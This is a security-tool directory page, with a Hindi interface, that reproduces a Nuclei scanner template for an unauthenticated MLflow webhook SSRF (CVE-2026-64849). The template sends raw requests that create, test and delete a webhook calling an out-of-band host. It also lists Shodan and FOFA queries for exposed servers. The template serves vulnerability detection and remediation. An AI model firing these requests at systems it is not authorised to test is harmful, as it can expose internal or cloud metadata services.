Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-64849.yaml — अनधिकृत MLflow वेबहुक SSRF (CVE-2026-64849) का पता लगाता है जो आंतरिक या क्लाउड मेटाडेटा सेवाओं तक पहुँचता है और रीडायरेक्ट बायपास के माध्यम से प्रतिक्रिया विवरण लीक करता है। | Kitploit
उपकरण/GitHubGitHub/zavisco/cve-2026-64849.yaml
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणएपीआई सुरक्षा परीक्षणजानकारी एकत्र करनाक्लाउड सुरक्षा
GitHubzavisco/cve-2026-64849.yaml

CVE-2026-64849.yaml

अनधिकृत MLflow वेबहुक SSRF (CVE-2026-64849) का पता लगाता है जो आंतरिक या क्लाउड मेटाडेटा सेवाओं तक पहुँचता है और रीडायरेक्ट बायपास के माध्यम से प्रतिक्रिया विवरण लीक करता है।

रिपॉजिटरी देखें
0 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

id: CVE-2026-64849

info: name: MLflow वेबहुक SSRF - रीडायरेक्ट बायपास के माध्यम से बिना प्रमाणीकरण के पूर्ण-पठन author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0 में वेबहुक URL के अनुचित सत्यापन के कारण एक सूचना प्रकटीकरण भेद्यता मौजूद है, जो हमलावरों को आंतरिक या क्लाउड मेटाडेटा सेवाओं तक पहुँचने और प्रतिक्रिया विवरण प्राप्त करने की अनुमति देती है; शोषण के लिए वेबहुक परीक्षण एंडपॉइंट तक बिना प्रमाणीकरण के पहुँच आवश्यक है। impact: | हमलावर आंतरिक या क्लाउड मेटाडेटा सेवाओं तक पहुँच सकते हैं और प्रतिक्रिया स्थिति तथा बॉडी प्राप्त कर सकते हैं, जिससे संभावित रूप से संवेदनशील जानकारी उजागर हो सकती है। remediation: | MLflow को PR #24258 युक्त संस्करण में अपग्रेड करें, जो रीडायरेक्ट लक्ष्यों और DNS रीबाइंडिंग को कवर करते हुए कनेक्शन-समय IP सत्यापन के लिए SSRFProtectedHTTPAdapter जोड़ता है। reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev

variables: random: "{{rand_text_alpha(8)}}"

http:

  • raw:

    • | POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}

    • | POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}

    • | DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}

    matchers-condition: and matchers:

    • type: word part: body_1 words:

      • "webhook_id"
      • "ACTIVE" condition: and
    • type: word part: interactsh_protocol words:

      • "http"

    extractors:

    • type: regex name: webhook_id part: body internal: true regex:
      • '"webhook_id":\s*"([^"]+)"' group: 1

digest: 490a0046304402202e79c8a66a1a62e91bddc38dcebe402ecee4ff7036a36448e522f5bd64c13a8702203f2da52bd9424be56645e2866f623392ae4455c8d8c68549ab3d368fb7ff91c2:922c64590222798bb761d5b6d8e72950

टूल डाउनलोड करें